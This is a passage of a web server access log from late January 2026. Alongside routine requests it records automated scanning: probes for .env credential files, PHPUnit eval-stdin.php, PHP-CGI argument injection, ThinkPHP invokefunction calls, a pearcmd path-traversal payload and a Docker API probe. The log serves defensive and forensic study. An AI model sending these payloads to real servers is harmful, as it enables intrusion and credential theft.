Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:16:09:28 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:16:11:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:16:18:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:16:27:37 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:16:30:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:16:40:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:16:44:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:16:50:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:17:00:07 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:17:06:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:17:10:32 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:17:15:12 +0000] 404 - GET http 91.82.215.191 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:17:22:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:17:28:39 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:17:28:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 87.121.84.56] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[29/Jan/2026:17:38:01 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:17:43:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:17:48:56 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:17:52:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.9.64.113] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[29/Jan/2026:17:55:08 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:18:11:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:18:13:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:18:17:06 +0000] 404 - GET http 91.82.215.191 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:18:22:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:18:31:09 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/6.2.7 Safari/537.85.16" "-" +[29/Jan/2026:18:31:09 +0000] 404 - GET http 91.82.215.191 "/stage/.env.bak" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)" "-" +[29/Jan/2026:18:31:10 +0000] 404 - GET http 91.82.215.191 "/tmp/.env.token" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.22 (X11; Linux i686; U; de)" "-" +[29/Jan/2026:18:31:10 +0000] 404 - GET http 91.82.215.191 "/test/.env.conf" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FCTB100815; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; BOIE8;ENUS)" "-" +[29/Jan/2026:18:31:10 +0000] 404 - GET http 91.82.215.191 "/users/.env.bak" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3;en-es; ZTE V791 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[29/Jan/2026:18:31:10 +0000] 404 - GET http 91.82.215.191 "/users/.env.dev" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18" "-" +[29/Jan/2026:18:31:10 +0000] 404 - GET http 91.82.215.191 "/utilities/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63" "-" +[29/Jan/2026:18:31:11 +0000] 404 - GET http 91.82.215.191 "/prod/.env.dist" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" "-" +[29/Jan/2026:18:31:11 +0000] 404 - GET http 91.82.215.191 "/terraform/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "-" +[29/Jan/2026:18:31:11 +0000] 404 - GET http 91.82.215.191 "/staging/.env.2" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.21 Safari/537.36 OPR/40.0.2306.0 (Edition developer)" "-" +[29/Jan/2026:18:31:11 +0000] 404 - GET http 91.82.215.191 "/printenv.shtml" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; WL-101GQC Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[29/Jan/2026:18:31:12 +0000] 404 - GET http 91.82.215.191 "/symfony/env.py" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "-" +[29/Jan/2026:18:31:12 +0000] 404 - GET http 91.82.215.191 "/staging/.env.1" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_2 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A421 Safari/604.1" "-" +[29/Jan/2026:18:31:12 +0000] 404 - GET http 91.82.215.191 "/var/.env.local" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SM-G930V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36" "-" +[29/Jan/2026:18:31:12 +0000] 404 - GET http 91.82.215.191 "/stg/config.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; IE0006_ver1;EN_US)" "-" +[29/Jan/2026:18:31:12 +0000] 404 - GET http 91.82.215.191 "/stg/.env.local" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (OS/2; Warp 4.5; rv:45.0) Gecko/20100101 Firefox/45.0" "-" +[29/Jan/2026:18:31:12 +0000] 404 - GET http 91.82.215.191 "/tmp/.env.local" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]" "-" +[29/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.215.191 "/src/config.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[29/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.215.191 "/variables/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.91 Safari/537.36 Vivaldi/1.92.917.39" "-" +[29/Jan/2026:18:31:13 +0000] 404 - GET http 91.82.215.191 "/src/env/env.ts" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.6 Safari/537.36 OPR/34.0.1996.0 (Edition developer)" "-" +[29/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.215.191 "/src/.env.local" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; es-es; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[29/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.215.191 "/sicherung/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; SunOS sun4u; de-DE; rv:1.9.1b4) Gecko/20090428 Firefox/2.0.0.0" "-" +[29/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.215.191 "/wordpress/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; InfoPath.3; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" "-" +[29/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.215.191 "/workspace/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344" "-" +[29/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.215.191 "/panel/.env.uat" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.4; SM-G900V Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36" "-" +[29/Jan/2026:18:31:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:18:31:14 +0000] 404 - GET http 91.82.215.191 "/panel/.env.tmp" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36" "-" +[29/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.215.191 "/panel/.env.pem" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9" "-" +[29/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.215.191 "/panel/.env.old" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19" "-" +[29/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.215.191 "/panel/.env.log" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.24" "-" +[29/Jan/2026:18:31:15 +0000] 404 - GET http 91.82.215.191 "/panel/.env.key" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.18 Safari/525.19" "-" +[29/Jan/2026:18:31:16 +0000] 404 - GET http 91.82.215.191 "/panel/.env.gcp" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-P7500 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[29/Jan/2026:18:32:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:18:40:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:18:46:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:18:46:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.88.110.161] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[29/Jan/2026:18:47:43 +0000] 400 - GET http 91.82.215.191 "/" [Client 45.194.70.252] [Length 252] [Gzip -] "curl/7.29.0" "-" +[29/Jan/2026:18:47:45 +0000] 400 - - http localhost "-" [Client 45.194.70.252] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:18:54:41 +0000] 404 - GET http 91.82.215.191 "/mifs/c/windows/api/v2/device/registration" [Client 134.209.174.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36" "-" +[29/Jan/2026:18:54:44 +0000] 404 - GET http 91.82.215.191 "/mifs/rs/api/v2/device/registration" [Client 134.209.174.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (SS; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[29/Jan/2026:18:57:55 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 144.31.230.208] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:18:57:56 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 144.31.230.208] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:18:57:56 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:56 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 144.31.230.208] [Length 154] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:56 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:56 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:56 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:57 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:57 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:57 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:57 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:57 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:58 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:58 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:58 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:58 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:58 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:57:59 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:00 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:01 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:01 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:01 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:02 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:07 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:08 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:13 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:16 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:17 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:18 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:20 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:27 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:29 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:30 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:31 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:32 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:32 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:35 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:36 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:38 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:41 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 142.93.210.233] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[29/Jan/2026:18:58:42 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:18:58:46 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:47 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:58:59 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:59:01 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:59:03 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:18:59:05 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 144.31.230.208] [Length 150] [Gzip -] "libredtail-http" "-" +[29/Jan/2026:19:06:58 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:19:08:30 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:19:10:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:19:12:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:19:18:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:19:22:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 